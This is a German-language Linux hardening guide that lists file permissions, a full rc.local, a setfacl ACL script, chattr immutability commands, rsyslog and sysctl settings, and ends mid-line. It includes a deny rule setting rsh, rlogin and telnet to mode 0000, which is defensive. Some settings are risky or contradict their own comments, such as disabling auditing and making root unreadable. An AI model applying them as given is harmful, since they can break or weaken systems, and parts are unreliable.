root:sys 755 /usr/share/cups/* root:sys 755 /etc/cups root:sys 755 /etc/cups/* root:sys 755 /var/cache/cups root:sys 775 /var/cache/cups/rss root:sys 775 /lib64/ld*.so root:root 755 /lib64/libc-*.so root:root 755 /usr/lib64/kde4 root:root 751 /usr/lib64/kde4/* root:root 755 /usr/share root:root 755 /usr/games root:root 751 /etc/security/msec/*.secure root:root 751 /usr/local root:root 755 /usr/share/* root:root 755 /usr/bin/rsh root:root 0000 /usr/bin/rlogin root:root 0000 /usr/bin/rcp root:root 0000 /usr/bin/telnet* root:root 0000 /usr/bin/scp root:root 0000 /kerberos/bin/rsh root:root 0000 /kerberos/bin/rlogin root:root 0000 /kerberos/bin/rcp root:root 0000 /kerberos/bin/telnet* root:root 0000 /home/user/.kde4/share/config root:root 755 /home/user/.kde4/share/apps root:root 755 /home/user/.kde4/share/icons root:root 755 Aufruf, z.B. in /etc/rc.local: chkstat --set --no-fscaps /etc/permissions # rpm "permissions" von OpenSuSE (eignet sich auch bestens fü,r CentOS 6), chkstat --set --no-fscaps /etc/permissions.secure # obige Konfiguration chkstat --set --no-fscaps /etc/permissions.local # ... hier erst noch konfigurieren! ... doch wo gehört das hier mit capabilities nur hin (Zeile verrutscht!)?: +capabilities cap_net_bind_service=ep CAPABILITIES capsh, getcap, setcap, ... linux - Using capsh to drop all capabilities - Stack Overflow root: All caps are assigned to root by default ! pub enum Capability { CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_DAC_READ_SEARCH, CAP_FOWNER, CAP_FSETID, CAP_KILL, CAP_SETGID, CAP_SETUID, CAP_SETPCAP Drops the capability for the current process via a call to cap_drop_bound.0x0000003fffffffff=cap_chown, cap_dac_override, cap_dac_read_search, cap_fowner, cap_fsetid, cap_kill, cap_setgid, cap_setuid, cap_setpcap, cap_linux_immutable, cap_net_bind_service, cap_net_broadcast, cap_net_admin, cap_net_raw, cap_ipc_lock, cap_ipc_owner, cap_sys_module, cap_sys_rawio, cap_sys_chroot, cap_sys_ptrace, cap_sys_pacct, cap_sys_admin, cap_sys_boot, cap_sys_nice, cap_sys_resource, cap_sys_time, cap_sys_tty_config, cap_mknod, cap_lease, cap_audit_write, cap_audit_control, cap_setfcap, cap_mac_override, cap_mac_admin, cap_syslog, cap_wake_alarm, cap_block_suspend,37... Capabilities: capsh --print Current: = Bounding set = Securebits: 00/0x0/1´b0 secure-noroot: no (unlocked) secure-no-suid-fixup: no (unlocked) secure-keep-caps: no (unlocked) uid=10101(u0_a101) gid=10101... /etc/permissions.secure : ... /usr/sbin/pinger squid:root 0750 +capabilities cap_net_raw=ep ... /usr/bin/ping root:root 0755 +capabilities cap_net_raw=ep ... stackoverflow.com/questions/28811823/using-capsh-to-drop-all-capabilities /etc/rc.local (complete, vollständig) #!/bin/sh # ### BEGIN INIT INFO # Provides: rc.local # X-Mandriva-Compat-Mode # Default-Start: 2 3 4 5 # Short-Description: Local initialization script # Description: This script will be executed *after* all the other init scripts. # You can put your own initialization stuff in here if you don´t # want to do the full Sys V style init stuff. ### END INIT INFO sysctl -p /etc/sysctl.conf auditctl -e0 echo 1 > /sys/devices/system/cpu/microcode/reload # microcode_ctl -Qu sh /usr/libexec/microcode_ctl/reload_microcode hdparm -W1a0A0 /dev/sda # mausklick-schnelle SSD am S-ATA-Port, beachte die Anschlussnummer (1: sda, 2: sdb, ...) echo deadline > /sys/block/sdb/queue/scheduler echo 500 > /proc/sys/vm/dirty_writeback_centisecs echo 20 > /proc/sys/vm/dirty_ratio echo 5 > /proc/sys/vm/dirty_background_ratio echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6 echo 1 > /proc/sys/net/ipv4/tcp_syncookies echo "" > /etc/securetty # https://en.wikipedia.org/wiki/TCP_congestion-avoidance_algorithm # cat /proc/sys/net/ipv4/tcp_congestion_control # modprobe tcp_htcp modprobe sch_fq_codel modprobe tcp_cubic # modprobe tcp_bbr # echo sch_fq_codel > /proc/sys/net/core/default_qdisc echo cubic > /proc/sys/net/ipv4/tcp_congestion_control macchanger --mac=ac:22:ca:00:00:c1 eth0 echo sch_fq_codel > /proc/sys/net/core/default_qdisc xhost - xhost +si:localuser:user xhost -inet6:user@ xhost -nis:user@ xhost - 192.168.178.1 xhost - 192.168.178.40 echo 1 > /proc/sys/net/ipv4/conf/all/hidden # or net.ipv4.conf.all.hidden=1 within /etc/sysctl.conf echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden echo 1 > /proc/sys/net/ipv4/conf/all/secure_redirects echo 0 > /proc/sys/net/ipv4/conf/all/shared_media echo 1 > /proc/sys/net/ipv4/conf/eth0/secure_redirects echo 0 > /proc/sys/net/ipv4/conf/eth0/shared_media touch /var/lock/subsys/local modprobe usblp modprobe usb_storage ifconfig eth0 -multicast ifconfig lo -multicast ifconfig lo -broadcast ip link set eth0 multicast off ip link set lo multicast off sh /etc/init.d/ip6tables restart # wenn iptables-ipv6 (el6) neben iptables (el6) installiert worden ist; Der gesamte Traffic innerhalb des neuen Adressraums IPv6 wird auf INPUT, OUTPUT und FORWARD mit Linfw3 geblockt, siehe Regeln innerhalb /etc/sysconfig/ip6tables. Anstelle dieses totalen Blocks können alle IPv4-Regeln von Linfw3 in /usr/local/LINFW3.sh nach /etc/sysconfig/ip6tables übernommen werden, indem ipt="iptables" mit ipt="ip6tables" ausgestauscht wird. Überprüfe außerdem, ob /sbin/ip6tables* richtig mit /sbin/ip6tables-multi verlinkt ist. mount -t securityfs -o rw,noatime /sys/kernel/security /mnt2 #sh /etc/init.d/syslog start sh /etc/init.d/rsyslog start cp -fp /etc/hosts.savenew /etc/hosts cp -fp /etc/pdnsd-savenew.conf /etc/pdnsd.conf # cp -fp /boot-save/ifcfg-eth0* /etc/sysconfig/network-scripts/ cp -fp /boot-save/70-persistent-net.rules /etc/udev/rules.d/ export RESOLV_HOST_CONF="/etc/hosts" # sh /etc/init.d/incrond start # sh /etc/init.d/noflushd start # gpg-agent --daemon --use-standard-socket # atieventsd # dhclient -4 -cf /etc/dhcp/dhclient.conf eth0 & # NetworkManager --log-level=ERR # preload # ifup eth0 # acpid& # dnssec-triggerd # unbound -dv -c /etc/unbound/unbound.conf # tcpd & # sh /etc/init.d/xfs start # sh /etc/init.d/psad start # paxctld -c /etc/paxctld.conf -d -p /var/run/paxctld # dnscrypt-proxy --daemonize --user=pdnsd --local-address 127.0.0.2:53 -r 192.168.178.1 -l --tcp-port 443 /dev/null # dnscrypt-proxy --daemonize --user=pdnsd --local-address 127.0.0.2:53 -r 208.67.222.222 --tcp-port 443 -l /dev/null # dnscrypt-proxy --daemonize --user=pdnsd --local-address 127.0.0.2:53 -r 213.73.91.35 --tcp-port 443 -l /dev/null # cp -fp /var/cache/pdnsd.cache /var/cache/pdnsd-savenew.cache # speechd # artsd& # killall plymouthdxhost - # sh /etc/init.d/lpd start # redshift -l 60:10 -t 6500K:6200K& chkstat --set --no-fscaps /etc/permissions # rpm permissions form OpenSuSE chkstat --set --no-fscaps /etc/permissions.secure #apparmor_parser -af /etc/apparmor/profiles/extras/usr.lib.firefox.firefox & #apparmor_parser -af /etc/apparmor/profiles/sbin.dhclient & #apparmor_parser -af /etc/apparmor/profiles/usr.bin.man & #apparmor_parser -af /etc/apparmor/profiles/usr.bin/passwd & #apparmor_parser -af /etc/apparmor/profiles/extras/usr.lib.firefox.sh & # /usr/lib64/apparmorapplet& # unshare apparmor-dbus & # sh /etc/init.d/modules-disabled start# kernel.modules_disabled=1 after 90 seconds echo "ALLOW_REBOOT=yes" >> /etc/security/msec/security.conf echo "BASE_LEVEL=secure" > /etc/security/msec/security.conf echo "ENABLE_STARTUP_MSEC=yes" > /etc/security/msec/security.conf echo "ENABLE_STARTUP_PERMS=enforce" > /etc/security/msec/security.conf msec -f secure # msec: rpm from Mandriva Linux and Rosalabs # chmod 666 /dev/usb/lp0 # besser: Sämtliche chown und chmod in /etc/permissions.secure in der vorgesehenen Form eintragen! chown pdnsd:pdnsd -R /var/cache/pdnsd chmod 755 /var/cache/pdnsd/pdnsd.cache chown root:root /etc/hosts chmod 400 /usr/local/key chmod 644 /etc/hosts chmod 111 / chmod 751 /etc chmod 755 /etc/sysconfig/network chmod 755 /etc/sysconfig/network-scripts chmod 400 /etc/shadow* chmod 400 /etc/fstab* chmod 700 /etc/crypttab* chmod 700 /etc/mtab* chmod 711 /home chmod 700 /home/user chmod 700 /home/surfuser chmod 700 -R /home/surfuser/.mozilla chown root:root /home/surfuser/.mozilla/firefox/profile.default/user.js chmod 755 /home/surfuser/.mozilla/firefox/profile.default/user.js chown root:root /home/surfuser/.mozilla/firefox/prefs.js chmod 755 /home/surfuser/.mozilla/firefox/prefs.js chmod 700 -R /home/surfuser/.moon* chmod 700 -R /usr/src chmod 751 /etc/X11 chmod 751 /usr/lib64 chmod 751 /usr/lib64/kde4 chmod 700 /home/toruser chmod 700 -R /home/user/Dokumente chmod 700 /home/uuidd chmod 400 /usr/local/ke* chmod 755 /usr chmod 751 /bin chmod 751 /sbin chmod 751 /lib64 chmod 751 /opt chmod 751 /lib chmod 700 /root chmod 700 -R /etc/init.d chmod 751 /initrd chmod 751 /misc chmod 700 -R /boot-save chmod 644 /etc/passwd chmod 751 /usr/games chmod 751 /net chmod 710 /secoff chmod 700 /sid-root chmod 700 /smack chmod 751 /srv chmod 751 /sys chmod 700 /typo3i* chmod 751 /var chmod 700 /lost*found chmod 710 /intel-ucode* chmod 751 /initrd chmod 710 /GenuineIntel.bin chmod 751 /etc/security/msec/*.secure chmod 751 /Module.symvers rm -df /home/surfuser/.Xauth*.* rm -df /home/surfuser/.xauth* rm -df /home/toruser/.xauth* rm -df /home/toruser/.Xauth*.* rm -df /home/user/.kde4/share/apps/kmail/mail/Spam/cur/* rm -df /var/spool/cups/a* rm -df /var/spool/cups/b* rm -df /var/spool/cups/c* rm -df /var/spool/cups/d* rm -df /var/spool/cups/e* rm -df /var/spool/cups/f* rm -df /var/spool/cups/g* rm -df /var/spool/cups/h* rm -df /var/spool/cups/i* rm -df /var/spool/cups/j* rm -df /var/spool/cups/k* rm -df /var/spool/cups/l* rm -df /var/spool/cups/m* rm -df /var/spool/cups/o* rm -df /var/spool/cups/p* rm -df /var/spool/cups/q* rm -df /var/spool/cups/r* rm -df /var/spool/cups/s* rm -df /var/spool/cups/u* rm -df /var/spool/cups/v* rm -df /var/spool/cups/w* rm -df /var/spool/cups/x* rm -df /var/spool/cups/y* rm -df /var/spool/cups/z* echo ´V´ > /dev/watchdog sh /etc/init.d/dosetfacls start # script with setfacl from the next... exit Erzeuge noch /etc/init.d/dosetfacls #!/bin/sh # # This is file /etc/rc.d/init.d/linfw3 and was put here # by the linfw3 rpm # # chkconfig: 2345 92 36 # # description: secure iptables based firewall against all hacker and trojans \ # evtl. change chkconfig Number! # # ************************************** # # File : $Source: /cvsroot/ijbswa/current/linfw3.init,v $ # # Purpose : This shell script takes care of starting and stopping # linfw3. # # Copyright : Written by Gooken # http://www.gooken.de # # # # * ***********************************/ # Source function library. . /etc/rc.d/init.d/functions start () { # start daemon setfacl -m u:-1:- /* # There is an unnamed (!) process starting from time to time by user so called "-1, root".... listed on the buttom of the listing from ps -aux (gamin, FAM?) setfacl -m u:-1:- /mnt setfacl -m u:-1:- /media setfacl -m u:apache:- /home/user setfacl -m u:apache:- /home/surfuser setfacl -m u:apache:- /home/toranonym setfacl -m u:apache:- /mnt setfacl -m u:apache:- /media setfacl -m u:surfuser:- /etc/shadow* setfacl -m u:toranonym:- /etc/shadow* setfacl -m u:surfuser:- /etc/fstab* setfacl -m u:surfuser:- /etc/mtab* setfacl -m u:surfuser:- /etc/crypttab* setfacl -m u:toranonym:- /etc/fstab* setfacl -m u:toranonym:- /etc/mtab* setfacl -m u:toranonym:- /etc/crypttab* setfacl -m u:surfuser:- /etc/init.d setfacl -m u:surfuser:- /etc/init.d/* setfacl -m u:toranonym:- /etc/init.d setfacl -m u:toranonym:- /etc/init.d/* setfacl -m u:surfuser:- /etc/rc0.d setfacl -m u:surfuser:- /etc/rc1.d setfacl -m u:surfuser:- /etc/rc2.d setfacl -m u:surfuser:- /etc/rc3.d setfacl -m u:surfuser:- /etc/rc4.d setfacl -m u:surfuser:- /etc/rc5.d setfacl -m u:surfuser:- /etc/rc6.d setfacl -m u:surfuser:- /etc/rc.local setfacl -m u:toranonym:- /etc/rc0.d setfacl -m u:toranonym:- /etc/rc1.d setfacl -m u:toranonym:- /etc/rc2.d setfacl -m u:toranonym:- /etc/rc3.d setfacl -m u:toranonym:- /etc/rc4.d setfacl -m u:toranonym:- /etc/rc.local setfacl -m u:surfuser:- /etc/security/msec setfacl -m u:surfuser:- /etc/security setfacl -m u:toranonym:- /etc/security setfacl -m u:toranonym:- /etc/security/msec setfacl -m u:surfuser:- /etc/crypttab* setfacl -m u:surfuser:- /usr/bin/* setfacl -x surfuser /usr/bin/bash* setfacl -x surfuser /usr/bin/unshare setfacl -x surfuser /usr/bin/firejail* setfacl -x surfuser /usr/bin/firefox* setfacl -x surfuser /usr/bin/gftp* setfacl -x surfuser /usr/bin/tor* setfacl -x surfuser /usr/bin/xauth* setfacl -x surfuser /usr/bin/xargs* setfacl -x surfuser /usr/bin/sg* setfacl -x surfuser /usr/bin/palemoon* setfacl -x surfuser /usr/bin/export setfacl -x surfuser /usr/bin/thunderbird* setfacl -x surfuser /usr/bin/gpg-agent* setfacl -m u:surfuser:- /usr/libexec setfacl -m u:surfuser:- /usr/sbin setfacl -m u:surfuser:--x /bin setfacl -m u:surfuser:- /bin/* setfacl -m u:surfuser:- /sbin setfacl -x surfuser /bin/certtool setfacl -x surfuser /bin/certutil setfacl -x surfuser /bin/basename setfacl -x surfuser /bin/bash.old setfacl -x surfuser /bin/p11tool setfacl -x surfuser /bin/pk12util setfacl -x surfuser /bin/smime setfacl -x surfuser /bin/shlibsign setfacl -x surfuser /bin/sign* setfacl -x surfuser /bin/ssltap* setfacl -m u:surfuser:--x /home/surfuser setfacl -m u:toranonym:- /home/surfuser setfacl -m u:surfuser:- /usr/local setfacl -m u:surfuser:- /opt setfacl -m u:surfuser:--x /lib64 setfacl -m u:surfuser:--x /usr/lib64 setfacl -m u:surfuser:--x /lib setfacl -m u:surfuser:--x /usr/lib setfacl -m u:surfuser:- /misc setfacl -m u:surfuser:- /net setfacl -m u:surfuser:- /sid-root setfacl -m u:surfuser:--x /etc setfacl -m u:surfuser:- /intel-ucode setfacl -m u:surfuser:--x /secoff setfacl -m u:surfuser:- /smack setfacl -m u:surfuser:- /srv setfacl -m u:surfuser:- /--tcp-port setfacl -m u:surfuser:- /initrd setfacl -m u:surfuser:- /ttf setfacl -m u:surfuser:- /none setfacl -m u:surfuser:- /doc setfacl -m u:surfuser:- /firejail setfacl -m u:surfuser:- /root setfacl -m u:surfuser:- /usr/lib64/kde4/* setfacl -x surfuser /usr/lib64/kde4/libexec setfacl -m u:surfuser:- /usr/lib64/kde4/libexec/* setfacl -x surfuser /usr/lib64/kde4/libexec/kdesu* return } case "$1" in start) start ;; *) gprintf "Usage: %s {start|stop|restart|status} " "$LINFW3_PRG" exit 1 esac exit $RETVAL Beachte: toranonym ist veraltert und wurde einst für Tor erstellt. Tor läuft nun aber wie generell Surfen mit dem Browser gleich mit unter surfuser. Dennoch kann man toranonym weiterhin zur Vergabe höherer Privilegien an viele Prozesse wie z.B. Chat (xchat, kvirc) und marble usw. verwenden. Gegebenenfalls braucht man aber nur surfuser, in diesem Fall zu erlaubenden Prozess einfach wieder mit Option x von setfacl zurücksetzen (freigeben). Weitere Prozesse sind dann hier und da gleich mit zu erlauben. Ersetze $ mit dem Dollar-Zeichen... und starte dieses Skript bei jedem Bootvorgang in /etc/rc.local mittels "sh /etc/init.d/dosetfacls start" ! Ein Runlevel-Init-Skript sollte höheren Runleveln bekannt gemacht werden (gilt nicht für die von uns, Gooken, erstellte Skripte dosetfacls und modules-disabled): chkconfig --add rc.local && chkconfig --add a_runlevel_init_script Vorteil: mit jeder Installlation neuer Pakete bleiben die ACL-Zugriffsrechte nach dem Booten immer erhalten! Das System wird dadurch einmal mehr sicher und mausklick-schnell. Entleere /home/surfuser bis auf das Verzeichnnis .mozilla von Firefox, ."moonchild productions" von Pale Moon etc.! Change File Attributes (chattr) zur Sicherung der Datenintegrität ( +i : Unveränderbarkeit ) man chattr User-Extended-Attributes müssen für die zugehörige Partition als Option gesetzt sein! Beachte aber, dass sich im Home-Verzeichnis fast ausschließlich Konfigurationsdateien befinden, denen eine automatische Änderung widerfahren kann, darunter für den Graphikserver X11/Xorg. Wir raten daher von chattr auf diesem Verzeichnis ab! chattr +i -R /boot chattr +i /etc/hosts* # Neben Root-Eigentumsrechten wichtiger Schutz vor Server-Pharming chattr +i /etc/fstab chattr +i /home/surfuser/.mozilla chattr +i /home/surfuser/.mozilla/firefox/*.js chattr +i /home/surfuser/.mozilla/firefox/profile.default/user.js chattr +i /home/surfuser/torrc chattr +i /home/surfuser/geoip* chattr +i -R /home/user/.* chattr +i -R /home/user/* chattr -i -R /home/user/.dbus chattr -i /home/user/.cache chattr -i -R /home/user/.gnupg chattr -i -R /home/user/.pulse* chattr -i /home/user/.esd_auth* chattr -i /home/user/.screenrc* chattr -i /home/user/.Xauthority* chattr -i /home/user/.Xdefaults* chattr -i /home/user/.xsession* chattr -i -R /home/user/.gconf* chattr -i -R /home/user/.local* chattr -i -R /home/user/.mcop* chattr -i -R /home/user/.qt* chattr -i -R /home/user/.kde* chattr -i -R /home/user/.wine* chattr -i -R /home/user/.MANY_GAMES_CONFIGS* chattr -i -R /home/user/.config* Hinzu kommen u.a. noch die grsecurity-Patches für den Kernel (bzw. seine root-Prozesse), Login-Passwortschutz und Sperrung aller System- und Benutzerkonten außer surfuser (und, falls separat, toruser), Sandbox Firejail (insbesonders zum Sperren der Shells bzw. Terminals) und Firewall Linfw3, Tor bzw. der Tor-Browser sowie FirefoxBrowser-Extensions wie Skriptfilter ABP, nologin und RequestPolicyBlockContinued, dazu im Einzelnen sp&aul;ter. Set setfacl -m u:surfuser:- /usr/bin/* except for /usr/bin/bash, /usr/bin/export, /usr/bin/firefox, /usr/bin/firejail, /usr/bin/sg, /usr/bin/proftp*, /usr/bin/gftp*, /usr/bin/tor*, /usr/bin/xauth*, /usr/bin/xarg*, /usr/bin/tor and all communication programs, surfuser should be able to use. rsyslog anstelle syslogd Rsyslog is an enhanced multi-threaded syslogd supporting, among others, MySQL, PostgreSQL, syslog/tcp, RFC 3195, permitted sender lists, filtering on any message part, and fine grain output format control. It is quite compatible to stock sysklogd and can be used as a drop-in replacement. Its advanced features make it suitable for enterprise-class, encryption protected syslog relay chains while at the same time being very easy to setup for the novice user. o lmnet.so - Implementation of network related stuff. o lmregexp.so - Implementation of regexp related stuff. o lmtcpclt.so - This is the implementation of TCP-based syslog clients. o lmtcpsrv.so - Common code for plain TCP based servers. o imtcp.so - This is the implementation of the TCP input module. o imudp.so - This is the implementation of the UDP input module. o imuxsock.so - This is the implementation of the Unix sockets input module. o imklog.so - The kernel log input module for Linux. o immark.so - This is the implementation of the build-in mark message input module. o imfile.so - This is the input module for reading text file data. Noch sind noch alle *syslog*-init-script-Dateien aus /etc/rc*.d/ und /etc/init.d/ mit dem Befehl "rm -df" zu löschen. /etc/rsyslog.conf # rsyslog v5 configuration file # For more information see /usr/share/doc/rsyslog-*/rsyslog_conf.html # If you experience problems, see http://www.rsyslog.com/doc/troubleshoot.html #### MODULES #### DollarsignModLoad imuxsock # provides support for local system logging (e.g. via logger command) Dollarsignimklog # provides kernel logging support (previously done by rklogd) #DollarsignModLoad immark # provides --MARK-- message capability # Provides UDP syslog reception #$ModLoad imudp #$UDPServerRun 514 # Provides TCP syslog reception #$ModLoad imtcp #$InputTCPServerRun 514 #### GLOBAL DIRECTIVES #### # Use default timestamp format $ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat # File syncing capability is disabled by default. This feature is usually not required, # not useful and an extreme performance hit #$ActionFileEnableSync on # Include all config files in /etc/rsyslog.d/ $IncludeConfig /etc/rsyslog.d/*.conf #### RULES #### # Log all kernel messages to the console. # Logging much else clutters up the screen. #kern.* /dev/console # Log anything (except mail) of level info or higher. # Don´t log private authentication messages! *.warn;mail.none;news.none;authpriv.none;cron.none /tmp/messages # The authpriv file has restricted access. authpriv.* /tmp/secure # Log all the mail messages in one place. mail.* -/tmp/maillog # Log cron stuff cron.* /tmp/cron # Everybody gets emergency messages *.emerg * # Save news errors of level crit and higher in a special file. uucp,news.crit /tmp/spooler # Save boot messages also to boot.log local7.* /tmp/boot.log # ### begin forwarding rule ### # The statement between the begin ... end define a SINGLE forwarding # rule. They belong together, do NOT split them. If you create multiple # forwarding rules, duplicate the whole block! # Remote Logging (we use TCP for reliable delivery) # # An on-disk queue is created for this action. If the remote host is # down, messages are spooled to disk and sent when it is up again. #$WorkDirectory /var/lib/rsyslog # where to place spool files #$ActionQueueFileName fwdRule1 # unique name prefix for spool files #$ActionQueueMaxDiskSpace 1g # 1gb space limit (use as much as possible) #$ActionQueueSaveOnShutdown on # save messages to disk on shutdown #$ActionQueueType LinkedList # run asynchronously #$ActionResumeRetryCount -1 # infinite retries if host is down # remote host is: name/ip:port, e.g. 192.168.0.1:514, port optional #*.* @@remote-host:514 # ### end of the forwarding rule ### # # INN # news.=crit /tmp/news/news.crit news.=err /tmp/news/news.err news.notice /tmp/news/news.notice news.=debug /tmp/news/news.debug Mausklick-schnell: Kernel-Tuning mit sysctl nano /etc/sysctl, ausfürhliche Beschreibung mit sysctl-gtk # Kernel sysctl configuration file # /etc/sysctl.conf # sysctl settings are defined through files in # /usr/lib/sysctl.d/, /run/sysctl.d/, and /etc/sysctl.d/. # # Vendors settings live in /usr/lib/sysctl.d/. # To override a whole file, create a new file with the same in # /etc/sysctl.d/ and put new settings there. To override # only specific settings, add a file with a lexically later # name in /etc/sysctl.d/ and put new settings there. # # For more information, see sysctl.conf(5) and sysctl.d(5). # Kernel sysctl configuration file for CentOS and Mandriva Linux # # For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and # sysctl.conf(5) for more details. # /etc/sysctl.conf # additionally from http://joshrendek.com/2013/01/securing-ubuntu/ resp. http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf # Turn on execshild # kernel.exec-shield = 1 # Controls the System Request debugging functionality of the kernel kernel.sysrq =0 net.ipv6.conf.lo.use_tempaddr = 0 # Disables IP dynaddr net.ipv4.ip_dynaddr = 1 # Disable ECN net.ipv4.tcp_ecn = 1 # Controls source route verification net.ipv4.conf.all.rp_filter =1 net.ipv4.conf.default.rp_filter = 1 net.ipv4.tcp_congestion_control=cubic # Do not accept source routing net.ipv4.conf.default.accept_source_route = 0 # Controls the System Request debugging functionality of the kernel kernel.sysrq =0 # kernel.modules_disabled=0 # kernel.exec-shield=1 # Controls whether core dumps will append the PID to the core filename. # Useful for debugging multi-threaded applications. kernel.core_uses_pid = 0 # If the kptr_restrict value is 0, kernel addresses are provided without limitations (recommended). # If the kptr_restict value is 1, addresses are provided if the current user has a CAP_SYSLOG # capability. # If the kptr_restrict value is 2, the kernel addresses are hidden regardless of privileges the # current user has. kernel.kptr_restrict=2 kernel.dmesg_restrict = 1 # kernel.yama.ptrace_scope=3 # If you set this variable to 1 then cd tray will close automatically when the # cd drive is being accessed. # Setting this to 1 is not advised when supermount is enabled # (as it has been known to cause problems) dev.cdrom.autoclose=1 dev.cdrom.autoeject=1 # removed to fix some digital extraction problems # dev.cdrom.check_media=1 # to be able to eject via the device eject button (magicdev) dev.cdrom.lock=0 # Disable netfilter on bridges. #net.bridge.bridge-nf-call-ip6tables = 0 #net.bridge.bridge-nf-call-iptables = 0 #net.bridge.bridge-nf-call-arptables = 0 net.ipv4.ip_forward =0 # Do not send ICMP redirects (we are not a router) net.ipv4.conf.all.send_redirects = 0 net.ipv4.conf.default.send_redirects = 0 net.ipv4.tcp_max_syn_backlog =512 # Do not accept IP source route packets (we are not a router) net.ipv4.conf.all.accept_source_route = 0 net.ipv4.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv4.conf.all.secure_redirects = 1 net.ipv4.conf.default.accept_source_route = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv4.conf.default.secure_redirects = 0 net.ipv4.tcp_syncookies = 1 net.ipv4.conf.all.log_martians = 1 net.ipv4.conf.all.shared_media = 0 net.ipv4.conf.eth0.secure_redirects=1 net.ipv4.conf.eth0.shared_media=0 # Increase system IP port limits net.ipv4.ip_local_port_range = 2000 65000 # Increase TCP max buffer size setable using setsockopt() net.ipv4.tcp_rmem = 4096 87380 8388608 net.ipv4.tcp_wmem = 4096 87380 8388608 net.ipv6.conf.eth0.disable_ipv6=1 net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.router_solicitations=0 net.ipv4.tcp_syncookies = 1 net.ipv6.conf.default.accept_ra_rtr_pref=0 net.ipv6.conf.default.accept_ra_pinfo=0 net.ipv6.conf.default.accept_ra_defrtr=0 net.ipv6.conf.default.autoconf=0 net.ipv6.conf.default.dad_transmits=0 net.ipv6.conf.default.max_addresses=0 # # ls /lib/modules/´uname -r´/kernel/net/ipv4/ # modprobe tcp_htcp # modprobe tcp_cubic # modprobe tcp_bbr # net.core.default_qdisc=sch_fq_codel net.ipv4.tcp_congestion_control=cubic # BBR # net.core.default_qdisc=fq # net.ipv4.tcp_congestion_control=bbr # Increase Linux auto tuning TCP buffer limits # min, default, and max number of bytes to use # set max to at least 4MB, or higher if you use very high BDP paths net.core.somaxconn=65535 net.core.optmem_max=25165824 net.core.rmem_max =212992 net.core.wmem_max =212992 net.core.rmem_default =212992 net.core.wmem_default =212992 net.core.netdev_max_backlog = 1000 # kernel.sysrq = 0 kernel.core_uses_pid = 1 # Optimization for port usefor LBs # Increase system file descriptor limit fs.file-max=65535 fs.protected_hardlinks=1 fs.protected_symlinks=1 fs.protected_regular=1 # fs.protected_fifos=1 # this might cause overflow of processes akonadi_maildir: system runs out of capacities # fs.dir-notify-enable=0 # fs.mount-max=20 fs.suid_dumpable=0 # The kernel allocates aio memory on demand, and this number limits the # number of parallel aio requests; the only drawback of a larger limit is # that a malicious guest could issue parallel requests to cause the kernel # to set aside memory. Set this number at least as large as # 128 * (number of virtual disks on the host) # Libvirt uses a default of 1M requests to allow 8k disks, with at most # 64M of kernel memory if all disks hit an aio request at the same time. # fs.aio-max-nr = 1048576 # Allow for more PIDs (to reduce rollover problems); may break some programs 32768 kernel.pid_max=65536 net.ipv4.tcp_syncookies = 1 kernel.msgmnb = 65536 kernel.msgmax = 65536 kernel.shmmax = 3294967295 kernel.shmall = 3294967295 kernel.randomize_va_space = 2 net.ipv4.tcp_fin_timeout =3600 net.ipv4.tcp_keepalive_time =7200 net.ipv4.tcp_keepalive_probes =7 net.ipv4.tcp_syn_retries =6 net.ipv4.tcp_retries1 =1 net.ipv4.tcp_retries2 =3 net.ipv4.tcp_retrans_collapse =1 net.ipv4.tcp_sack =1 net.ipv4.ip_default_ttl =64 net.ipv4.ipfrag_time =30 net.ipv4.ip_no_pmtu_disc =0 net.unix.max_dgram_qlen =10 vm.overcommit_memory =2 vm.overcommit_ratio=200 # or: vm.overcommit_kbytes= vm.page-cluster =3 vm.oom_dump_tasks =0 vm.dirty_ratio=20 vm.dirty_writeback_centisecs=500 vm.dirty_background_ratio=5 kernel.ctrl-alt-del =1 kernel.panic =0 kernel.acct =4 2 30 # Uncomment the following to stop low-level messages on console #kernel.printk = 3 4 1 3 kernel.printk =0 6 1 3 kernel.printk_ratelimit = 5 # period to wait in seconds kernel.printk_ratelimit_burst = 60 # max. amount same time kernel.shmall =-1 # If the kptr_restrict value is 0, kernel addresses are provided without limitations (recommended). # If the kptr_restict value is 1, addresses are provided if the current user has a CAP_SYSLOG capability. # If the kptr_restrict value is 2, the kernel addresses are hidden regardless of privileges the current user has. kernel.kptr_restrict=2 # ptrace: process tracing # kernel.yama.ptrace_scope=3 dev.raid.speed_limit_min =1000 dev.raid.speed_limit_max =200000 net.ipv4.conf.all.rp_filter=1 net.ipv4.tcp_window_scaling=1 net.ipv4.tcp_timestamps=0 net.ipv4.conf.all.log_martians=1 net.ipv4.icmp_echo_ignore_all=1 net.ipv4.icmp_echo_ignore_broadcasts=1 net.ipv4.icmp_ignore_bogus_error_responses=1 net.ipv4.tcp_congestion_control=cubic net.ipv4.conf.all.secure_redirects=1 net.ipv4.conf.all.shared_media=0 net.ipv4.conf.eth0.secure_redirects=1 net.ipv4.conf.eth0.shared_media=0 # The kernel allocates aio memory on demand, and this number limits the # number of parallel aio requests; the only drawback of a larger limit is # that a malicious guest could issue parallel requests to cause the kernel # to set aside memory. Set this number at least as large as # 128 * (number of virtual disks on the host) # Libvirt uses a default of 1M requests to allow 8k disks, with at most # 64M of kernel memory if all disks hit an aio request at the same time. # fs.aio-max-nr = 1048576 http://www.linux-admins.net/2010/09/all-you-need-to-know-about-procsys.html Example for ulimit, ulimit -a and sysctl -a, https://forum.altlinux.org/index.php?topic=4786.0 Verlinke ln -sf /usr/sbin/sysctl /sbin/sysctl .. und aktiviere sysctl in /etc/rc.local: sysctl -p /etc/sysctl.config ktune: Tunen des Kernels bzw. mit Boot-Optionen ( /etc/init.d/ktune, falls nicht bereits in /boot/grub/menu.lst); mache es mausklick-schnell /etc/sysctl.d/* nano /etc/sysctl.d/01-disable-ipv6.conf net.ipv6.conf.all.disable_ipv6 = 1 nano /etc/systcl.conf oder nano /etc/sysctl.d/10-ptrace.conf kernel.yama.ptrace.scope=3 nano /etc/sysctl.d/50-kptr-restrict.conf kernel.kptr_restrict=2 nano /etc/sysctl.d/armci.conf # Controls the maximum shared segment size, in bytes, siehe auch /etc/sysctl.conf kernel.shmmax = 